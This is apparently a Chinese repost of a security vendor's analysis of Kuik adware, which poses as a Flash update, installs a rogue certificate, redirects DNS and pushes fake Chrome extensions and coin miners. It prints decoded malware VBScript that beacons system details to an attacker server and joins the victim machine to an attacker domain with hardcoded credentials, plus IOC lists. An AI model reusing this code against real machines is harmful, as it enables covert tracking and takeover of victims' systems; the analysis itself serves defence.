如何理解Kuik

今天就跟大家聊聊有關(guān)如何理解Kuik，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

最近我們的安全研究團(tuán)隊(duì)，就發(fā)現(xiàn)了這樣一款名為Kuik的惡意廣告軟件。攻擊者正試圖利用這種獨(dú)特的技術(shù)手法，將谷歌瀏覽器擴(kuò)展程序和數(shù)字貨幣礦工應(yīng)用推送給受害者。我們將對(duì)該惡意廣告軟件做進(jìn)一步的技術(shù)分析，以及為大家提供相關(guān)的移除說明。

技術(shù)說明

Stage 1 – .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

第一階段是使用.NET編寫的偽造Adobe Flash Player圖標(biāo)的應(yīng)用。這是典型的惡意捆綁，偽裝成Adobe Flash Player更新程序欺騙用戶安裝。

我們使用dotNet反編譯器（即dnSpy）打開后發(fā)現(xiàn)，該項(xiàng)目的原始名稱為WWVaper。

它有三個(gè)內(nèi)部資源：

證書（svr.crt）

一個(gè)合法的Flash（誘餌）

下一階段組件（upp.exe）

證書：

-----BEGIN CERTIFICATE-----
MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM
DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0
QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL
MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG
A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW
EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci
5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD
oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y
vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah5HtIYSJZ2xwIcH
qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX
N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU
3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG
A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3
LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t
ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB
hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN
AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm
AC+3h2huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi
0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX
2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0
2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX
+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=
-----END CERTIFICATE-----

證書詳情：

證書指向yahoo.com的一個(gè)DNS名稱。但是，證書路徑無效：

.NET installer負(fù)責(zé)安裝惡意證書和其他組件。首先，它會(huì)枚舉網(wǎng)絡(luò)接口并將收集的IP添加到列表中：

然后，它將新的IP作為DNS（18.219.162.248）添加到收集的接口，并安裝自己的證書（svr.crt）：

Stage 2 – upp.exe

3a13b73f823f081bcdc57ea8cc3140ac

此應(yīng)用是一個(gè)未被混淆過的installer bundle。在里面，我們找到了一個(gè)cabinet文件：

它包含要?jiǎng)h除的其他模塊：

應(yīng)用程序“install.exe”以“setup.bat”作為參數(shù)進(jìn)行部署。

Stage 3 - 從cabinet中解壓縮組件

應(yīng)用程序install.exe是基本的。它的唯一作用就是在提升模式（ elevated mode）下運(yùn)行下一個(gè)進(jìn)程。在下面，你可以看到它的main function：

腳本setup.bat部署了另一個(gè)名為SqadU9FBEV.bat的組件：

它通過ping 127.0.0.1來延遲執(zhí)行。然后，它會(huì)運(yùn)行第二個(gè)被編碼的腳本，并為其提供一個(gè)活動(dòng)ID作為參數(shù)：

下一個(gè)元素被部署為一個(gè)編碼的VBS腳本：

在解碼后（解碼器），我們可以清楚地看到該腳本的內(nèi)容：NYkjVVXepl.vbs。我們還看到了系統(tǒng)指紋和到服務(wù)器的信標(biāo)：

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") 
for each System in SystemSet 
  winVer = System.Caption 
next
Function trackEvent(eventName, extraData)
  Set tracking = CreateObject("MSXML2.XMLHTTP")
  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
  tracking.send
  err.clear
End Function

其中有一個(gè)非常有意思的片段，就是將受感染的計(jì)算機(jī)添加到域中：

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue  0) Or (err.number  0) Then
  trackEvent "join-domain-failed", ReturnValue
  WScript.Quit 1
Else
  trackEvent "join-domain-success", Null
  WScript.Quit 0
End IF

Payloads

該程序使用了一系列有效載荷，我們發(fā)現(xiàn)攻擊者尤其偏愛假冒Chrome瀏覽器擴(kuò)展程序。此外，還有一些數(shù)字貨幣礦工正在服務(wù)：

移除

Malwarebytes用戶（版本為3.x）可以通過運(yùn)行全面掃描從系統(tǒng)中移除此威脅，其中包括取消加入惡意域控制器，并將你的機(jī)器恢復(fù)到其原始狀態(tài)。

IOCs

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686
990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx
d-and-h[.]com/123.crx
d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx
d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx
kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx
tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751
33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268
7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD
761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A
871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

看完上述內(nèi)容，你們對(duì)如何理解Kuik有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝大家的支持。